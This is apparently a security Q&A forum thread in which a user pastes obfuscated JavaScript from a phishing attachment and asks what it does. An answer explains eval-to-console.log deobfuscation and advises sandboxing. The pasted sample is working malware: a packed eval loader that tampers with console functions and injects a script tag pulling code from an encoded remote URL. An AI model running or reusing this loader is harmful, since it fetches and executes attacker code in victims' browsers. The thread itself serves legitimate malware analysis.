# What is this obfuscated JS code trying to do?

Tags: malware, javascript, obfuscation

I received phishing email that contains base64 encrypted JS code in the attachment. I decrypted it but can't understand it because of obfuscation. Do you guys have any clue what this code is trying to do?

```
<script>
  eval(function($nbrut, $utnbr, $nbr, $ut, $uyn, $yun) {
    $uyn = function($charCode) {
      return ($charCode < $utnbr ? '' : $uyn(parseInt($charCode / $utnbr))) + (($charCode = $charCode % $utnbr) > 35 ? String.fromCharCode($charCode + 29) : $charCode.toString(36));
    };
    if (!''.replace(/^/, String)) {
      while ($nbr--) {
        $yun[$uyn($nbr)] = $ut[$nbr] || $uyn($nbr);
      }
      $ut = [function($encoded) {
        return $yun[$encoded]
      }];
      $uyn = function() {
        return '\\w+'
      };
      $nbr = 1;
    };
    while ($nbr--) {
      if ($ut[$nbr]) {
        $nbrut = $nbrut.replace(new RegExp('\\b' + $uyn($nbr) + '\\b', 'g'), $ut[$nbr]);
      }
    }
    return $nbrut;
  }('5 f=["1G=","I==","H","z=","Z==","X","T==","s","W","N","O","P","Q=","R==","S=","U","M=","V=","Y=","10","17=","12==","13==","14=="];!7(e,x){!7(x){c(;--x;)e.15(e.K())}(L)}(f);5 3=7(x,e){5 r=f[x=+x];j 0===3.k&&(3.i=7(x){c(5 e=7(x){c(5 e,r,d=l(x).J(/=+$/,""),n="",t=0,a=0;r=d.u(a++);~r&&(e=t%4?v*e+r:r,t++%4)&&(n+=l.w(y&e>>(-2*t&6))))r="B+/=".C(r);8 n}(x),r=[],d=0,n=e.A;d < n; d++) r += "%" + ("D" + e.E(d).h(16)).F(-2); 8 G(r)
  }, 3. g = {}, 3. k = !0);
  5 d = 3. g[x];
  8 j 0 === d ? (r = 3. i(r), 3. g[x] = r) : r = d, r
  }, 9 = 7() {
    5 d = !0;
    8 7(e, r) {
      5 x = d ? 7() {
        11(r) {
          5 x = r[3("19")](e, 1 b);
          8 r = 1 x, x
        }
      } : 7() {};
      8 d = !1, x
    }
  }(), m = 9(18, 7() {
    c(5 x = 7() {
      5 e;
      1 z {
        e = 1 A(3("1B") + (3("1C") + 3("1D")) + ");")()
      }
      1 E(x) {
        e = 1 F
      }
      8 e
    }(), e = x[3("o")] = x[3("o")] || {}, r = [3("1J"), 3("1H"), 3("1K"), "1I", "1w", 3("1v"), "1k"], d = 0; d < r[3("1t")]; d++) {
      5 n = 9[3("1u")][3("1c")] .1 d(9), t = r[d], a = e[t] || n;
      n[3("1e")] = 9[3("q")](9), n[3("1f")] = a.h[3("q")](a), e[t] = n
    }
  });
  m();
  5 1 g = "", b = p[3("1h")](3("1i"));
  b[3("1a")] = 3("1j"), b[3("1l")] = 3("1m") + "1n.1o/1p" + 3("1q"), p[3("1r")]("1s")[0][3("1y")](b);
  ',62,109,' || | _0x2e1d ||
    var || function |
    return |_0x237cb5 | _ | script34ssd |
      for || | _0x10e7 | qQsyqN | toString | ZNmmFr | void | AbRSQZ | String | _0x51b37a || 0x0 | document | 0x6 || Dgv4Dc9QyxzHC2nYAxb0 || charAt | 64 | fromCharCode || 255 | yxbWzw5Kq2HPBgq | length | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | indexOf | 00 | charCodeAt | slice | decodeURIComponent | ChjVDg90ExbL | D2fYBG | replace | shift | 359 | DgfIBgu | Bg9N | E30Uy29UC3rYDwn0B3iOiNjLDhvY | BgvUz3rO | zJa3mZq1mZe5mZeUANm | CMv0DxjUicHMDw5JDgLVBIGPia | BIb0AgLZiIKOicK | DhLWzq | C3jJ | y29UC3rYDwn0B3i | x19WCM90B19F | Ahr0Chm6lY90AxrRBY53yw5Jzg5H | yxbWBhK | yMLUza | C2nYAxb0 |
      if | Aw5MBW | y29UC29Szq | y3jLyxrLrwXLBwvUDa | push || z2v0rwXLBwvUDhncEvrHz05HBwu | this | 0x14 | 0x8 | arguments | 0x4 | bind | 0xa | 0x2 | emfromgetnbrtoo | 0x1 | 0x15 | 0x9 | trace | 0x11 | 0x7 | pp | page | 60 d36be72458a | 0xe | 0x16 | head | 0xd | 0x13 | 0x12 | exception | null | 0x5 |
    try | Function | 0xf | 0xc | 0x10 |
    catch | window | Dg9tDhjPBMC | 0x3 | error | 0xb | 0x17 '.split(' | '),0,{}))
</script>
```

Comment: I'm voting to close, because this is not a malware analysis service.

Comment: Unfortunately, we can't review random code, else, as you can imagine, we'd be flooded with code.

Comment: Could you share the original base64 code?

Answer (score 1):

Obfuscated code normally follow two steps:

1. Assemble the actual code into a string in some extremely convoluted way.
2. Run it with `eval`.

All you have to do to deobfuscate it is to replace the `eval` with `console.log` so that instead of running it, you just output it. In this case, it turns out to be quite simple, since the `eval` is right there at the start.

After that first deobfuscation, it might not still be obvious what the code does. You'll just have to read through it and try to understand.

**A warning, though:** You should be careful about where you play around with malisious code. You can never be sure if you have properly defused it, so only run it in a safely sandboxed environment. I would feel confident something like a [JS fiddle](https://jsfiddle.net/) is enough, but others might disagree.